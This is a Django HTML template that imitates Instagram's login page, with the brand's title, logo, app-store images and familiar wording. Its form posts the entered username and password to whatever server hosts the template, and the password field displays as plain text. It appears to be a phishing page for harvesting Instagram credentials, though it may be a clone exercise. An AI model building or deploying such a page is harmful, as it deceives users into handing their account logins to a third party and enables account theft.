{%load static%}

<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="{% static 'ip_static/css/main.css' %}"  >
  <title>Instagram</title>
</head>
<body>
  <main class="l-main">
      <div class="l-main__img">
        <form method="post">
          {%csrf_token%} 
        <img src="{% static 'ip_static/img/homepage.png' %}" alt="Smartphones">
      </div>
      <div class="l-user">
        <div class="c-panel group">
          <img class="c-panel__img" src="{% static 'ip_static/img/instagram.svg' %}" alt="Instagram">
          <div class="c-panel__form">
            <input type="text" class="c-panel__input" name="username" placeholder="Phone number, username, or email">
            <input type="text" class="c-panel__input" name="password" placeholder="Password">
            <button type='submit' class="c-btn">Log In</button>
            <span class="c-panel__span">OR</span>
          </div>
          {% comment %} <a href="#" class="c-panel__facebook">Login with Facebook</a> {% endcomment %}
          <a href="#" class="c-panel__forgot">Forgot password?</a>
        </div>
        <div class="c-signup group">
          <p>Don't have an account? <span>Sign up</span></p>
        </div>
        <div class="c-app">
          <p>Get the app.</p>
          <div class="c-app__download">
            <img src="{% static 'ip_static/img/apple.png' %}" alt="Apple Store">
            <img src="{% static 'ip_static/img/google.png' %}" alt="Google Play">
          </div>
        </div>
      </div>
    </form>
  </main>
</body>
</html>